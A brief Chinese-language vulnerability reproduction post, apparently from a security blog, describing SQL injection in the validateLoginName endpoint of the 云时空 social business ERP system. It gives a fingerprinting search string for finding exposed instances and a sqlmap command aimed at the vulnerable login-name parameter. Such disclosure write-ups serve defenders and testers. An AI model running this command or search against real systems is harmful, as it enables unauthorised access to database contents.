云时空 社会化商业ERP系统 validateLoginName SQL注入漏洞

漏洞描述

云时空 社会化商业ERP系统存在SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息。

漏洞影响

云时空 社会化商业ERP系统

网络测绘

title=”云时空社会化商业ERP”

漏洞复现

登录页面

20240426103933175-1630040977210-31a0a314-667a-4cbe-9a9b-dce153582ee0.d701488a_2024-04-26_10-39-16 (1)

使用SQLmap验证漏洞

sqlmap -u "http://xxx.xxx.xxx.xxx/sys/user/validateLoginName?loginName=admin"

20240426104215776-1630041138096-be221d73-c3e6-44b8-b0e8-71a999cb58f7.113307bd_2024-04-26_10-41-53 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容